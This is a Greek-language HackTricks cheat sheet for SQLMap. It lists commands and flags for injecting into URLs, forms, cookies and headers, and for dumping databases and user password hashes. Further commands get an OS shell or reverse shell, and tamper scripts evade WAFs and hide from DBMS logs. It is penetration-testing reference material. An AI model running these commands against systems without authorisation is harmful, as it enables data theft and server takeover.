HackTricks
SQLMap
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Βασικές παράμετροι για το SQLmap
Γενικά
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
Σημαίες τεχνικών (--technique)
Το όρισμα --technique ορίζει ποιες μεθόδους SQL injection θα επιχειρήσει το sqlmap.
Κάθε χαρακτήρας στην αλυσίδα αντιπροσωπεύει μια τεχνική:
| Γράμμα | Τεχνική | Περιγραφή |
|---|---|---|
| B | Boolean-based blind | Χρησιμοποιεί συνθήκες true/false για να συναγάγει δεδομένα |
| E | Error-based | Εκμεταλλεύεται λεπτομερή μηνύματα σφάλματος του DBMS για να εξάγει αποτελέσματα |
| U | UNION query | Εισάγει δηλώσεις UNION SELECT για να ανακτήσει δεδομένα μέσω του ίδιου καναλιού |
| S | Stacked queries | Προσθέτει επιπλέον εντολές διαχωρισμένες με ; |
| T | Time-based blind | Βασίζεται σε καθυστερήσεις (SLEEP, WAITFOR) για να ανιχνεύσει injection |
| Q | Inline / out-of-band | Χρησιμοποιεί συναρτήσεις όπως LOAD_FILE() ή OOB κανάλια όπως DNS |
Η προεπιλεγμένη σειρά είναι BEUSTQ. Μπορείτε να τις αναδιατάξετε ή να τις περιορίσετε, π.χ. μόνο Boolean και Time-based με αυτή τη σειρά:
sqlmap -u "http://target/?id=1" --technique="BT" --batch
Ανάκτηση Πληροφοριών
Εσωτερικά
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
DB δεδομένα
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
Θέση Injection
Από την καταγραφή του Burp/ZAP
Καταγράψτε το αίτημα και δημιουργήστε ένα αρχείο req.txt
sqlmap -r req.txt --current-user
Έγχυση σε GET Request
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
POST Request Injection
sqlmap -u "http://example.com" --data "username=*&password=*"
Injections σε Headers και άλλες HTTP Methods
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
Έγχυση δεύτερης τάξης
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
Shell
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
Σάρωση ενός ιστότοπου με SQLmap και αυτόματη εκμετάλλευση
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
Προσαρμογή Injection
Ορισμός κατάληξης
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
Πρόθεμα
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
Βοήθεια στον εντοπισμό boolean injection
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
Tamper
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
| Tamper | Περιγραφή |
|---|---|
| apostrophemask.py | Αντικαθιστά τον χαρακτήρα απόστροφου με την πλήρους πλάτους UTF-8 αντίστοιχό του |
| apostrophenullencode.py | Αντικαθιστά τον χαρακτήρα απόστροφου με το μη έγκυρο διπλό Unicode αντίστοιχο |
| appendnullbyte.py | Προσθέτει κωδικοποιημένο NULL byte στο τέλος του payload |
| base64encode.py | Κωδικοποιεί όλους τους χαρακτήρες του payload σε Base64 |
| between.py | Αντικαθιστά τον τελεστή ‘>’ με ‘NOT BETWEEN 0 AND #’ |
| bluecoat.py | Αντικαθιστά το κενό μετά την SQL εντολή με έγκυρο τυχαίο κενό χαρακτήρα. Στη συνέχεια αντικαθιστά το χαρακτήρα = με τον τελεστή LIKE |
| chardoubleencode.py | Κάνει διπλό URL-encoding σε όλους τους χαρακτήρες του payload (δεν επεξεργάζεται ήδη κωδικοποιημένους) |
| commalesslimit.py | Αντικαθιστά περιπτώσεις τύπου ‘LIMIT M, N’ με ‘LIMIT N OFFSET M’ |
| commalessmid.py | Αντικαθιστά περιπτώσεις τύπου ‘MID(A, B, C)’ με ‘MID(A FROM B FOR C)’ |
| concat2concatws.py | Αντικαθιστά περιπτώσεις τύπου ‘CONCAT(A, B)’ με ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’ |
| charencode.py | Κάνει URL-encoding σε όλους τους χαρακτήρες του payload (δεν επεξεργάζεται ήδη κωδικοποιημένους) |
| charunicodeencode.py | Κάνει Unicode-URL-encoding στους μη κωδικοποιημένους χαρακτήρες ενός payload (δεν επεξεργάζεται ήδη κωδικοποιημένους). “%u0022” |
| charunicodeescape.py | Κάνει Unicode-URL-encoding στους μη κωδικοποιημένους χαρακτήρες ενός payload (δεν επεξεργάζεται ήδη κωδικοποιημένους). “\u0022” |
| equaltolike.py | Αντικαθιστά όλες τις εμφανίσεις του τελεστή ίσον (‘=’) με τον τελεστή ‘LIKE’ |
| escapequotes.py | Κάνει escape με backslash τα εισαγωγικά (’ και “) |
| greatest.py | Αντικαθιστά τον τελεστή ‘>’ με την αντίστοιχη GREATEST μορφή |
| halfversionedmorekeywords.py | Προσθέτει σχολιασμό MySQL με έκδοση πριν από κάθε keyword |
| ifnull2ifisnull.py | Αντικαθιστά περιπτώσεις τύπου ‘IFNULL(A, B)’ με ‘IF(ISNULL(A), B, A)’ |
| modsecurityversioned.py | Περιβάλλει ολόκληρο το query με σχολιασμό έκδοσης |
| modsecurityzeroversioned.py | Περιβάλλει ολόκληρο το query με σχόλιο μηδενικής έκδοσης |
| multiplespaces.py | Προσθέτει πολλαπλά κενά γύρω από SQL keywords |
| nonrecursivereplacement.py | Αντικαθιστά προκαθορισμένα SQL keywords με αναπαραστάσεις κατάλληλες για replacement (e.g. .replace(“SELECT”, “”)) φίλτρα |
| percentage.py | Προσθέτει το σύμβολο ποσοστού (‘%’) μπροστά από κάθε χαρακτήρα |
| overlongutf8.py | Μετατρέπει όλους τους χαρακτήρες σε overlong UTF-8 σε ένα δεδομένο payload (δεν επεξεργάζεται ήδη κωδικοποιημένους) |
| randomcase.py | Αντικαθιστά κάθε χαρακτήρα keyword με τυχαίο case value |
| randomcomments.py | Προσθέτει τυχαία σχόλια σε SQL keywords |
| securesphere.py | Προσθέτει ειδικά κατασκευασμένη συμβολοσειρά |
| sp_password.py | Προσθέτει ‘sp_password’ στο τέλος του payload για αυτόματη απόκρυψη από DBMS logs |
| space2comment.py | Αντικαθιστά το κενό (’ ’) με σχόλια |
| space2dash.py | Αντικαθιστά το κενό (’ ‘) με ένα dash comment (’–‘) ακολουθούμενο από τυχαία συμβολοσειρά και νέα γραμμή (’\n’) |
| space2hash.py | Αντικαθιστά το κενό (’ ‘) με ένα χαρακτήρα pound (’#‘) ακολουθούμενο από τυχαία συμβολοσειρά και νέα γραμμή (’\n’) |
| space2morehash.py | Αντικαθιστά το κενό (’ ‘) με ένα χαρακτήρα pound (’#‘) ακολουθούμενο από τυχαία συμβολοσειρά και νέα γραμμή (’\n’) |
| space2mssqlblank.py | Αντικαθιστά το κενό (’ ’) με τυχαίο κενό χαρακτήρα από ένα έγκυρο σύνολο εναλλακτικών χαρακτήρων |
| space2mssqlhash.py | Αντικαθιστά το κενό (’ ‘) με χαρακτήρα pound (’#‘) ακολουθούμενο από νέα γραμμή (’\n’) |
| space2mysqlblank.py | Αντικαθιστά το κενό (’ ’) με τυχαίο κενό χαρακτήρα από ένα έγκυρο σύνολο εναλλακτικών χαρακτήρων |
| space2mysqldash.py | Αντικαθιστά το κενό (’ ‘) με dash comment (’–‘) ακολουθούμενο από νέα γραμμή (’\n’) |
| space2plus.py | Αντικαθιστά το κενό (’ ‘) με plus (’+’) |
| space2randomblank.py | Αντικαθιστά το κενό (’ ’) με τυχαίο κενό χαρακτήρα από ένα έγκυρο σύνολο εναλλακτικών χαρακτήρων |
| symboliclogical.py | Αντικαθιστά τους λογικούς τελεστές AND και OR με τους συμβολικούς αντιστοίχους τους (&& and ||) |
| unionalltounion.py | Αντικαθιστά UNION ALL SELECT με UNION SELECT |
| unmagicquotes.py | Αντικαθιστά τον χαρακτήρα εισαγωγικών (’) με έναν multi-byte συνδυασμό %bf%27 μαζί με γενικό σχόλιο στο τέλος (για να λειτουργήσει) |
| uppercase.py | Μετατρέπει κάθε χαρακτήρα keyword σε κεφαλαίο, π.χ. ‘INSERT’ |
| varnish.py | Προσθέτει HTTP header ‘X-originating-IP’ |
| versionedkeywords.py | Εγκλείει κάθε μη-συναρτησιακό keyword με versioned MySQL σχόλιο |
| versionedmorekeywords.py | Εγκλείει κάθε keyword με versioned MySQL σχόλιο |
| xforwardedfor.py | Προσθέτει ψευδές HTTP header ‘X-Forwarded-For’ |
| luanginxmore.py | Tamper μόνο για POST που προεπικαλεί εκατομμύρια ψεύτικες παραμέτρους για να εξαντλήσει τους parsers των Lua‑Nginx WAFs (e.g., Cloudflare). |
luanginxmore δημιουργεί ~4.2M τυχαίες POST παραμέτρους πριν το payload σου· χρησιμοποίησέ το μόνο με --method=POST και να περιμένεις μεγάλες αιτήσεις που μπορεί να καταρρεύσουν κακώς ρυθμισμένα Lua-Nginx WAFs.
Πρόσφατες επιλογές που αξίζει να ενεργοποιήσετε (>=1.9.x)
- HTTP/2 transport:
--http2αναγκάζει το sqlmap να χρησιμοποιεί HTTP/2 (χρήσιμο εναντίον front-ends που επιβάλλουν rate-limit για HTTP/1.1 αλλά χαλαρώνουν για h2). Συνδύασε με--force-sslγια να επιβάλλεις HTTPS. - Proxy rotation:
--proxy-file proxies.txt --proxy-freq 3θα κάνει εναλλαγή μέσα από μια λίστα proxies, αλλάζοντας proxy κάθε 3 αιτήσεις για να αποφύγει throttling βάσει IP. - Offline / purge modes:
--offlineεπαναχρησιμοποιεί cached session data χωρίς να αγγίζει τον στόχο (μηδενική δικτυακή κίνηση), ενώ--purgeσβήνει με ασφάλεια τον φάκελο session/output όταν τελειώσεις. - Mobile UA emulation:
--mobileθα σε προτρέψει να πλαστογραφήσεις έναν δημοφιλή User-Agent smartphone, χρήσιμο σε APIs που εκθέτουν επιπλέον πεδία σε mobile clients.
Αναφορές
- SQLMap Usage Wiki
- SQLMap Command Builder (flags summary incl. HTTP/2)
- luanginxmore tamper (sqlmap GitHub)
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
Μάθετε & εξασκηθείτε στο GCP Hacking:Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.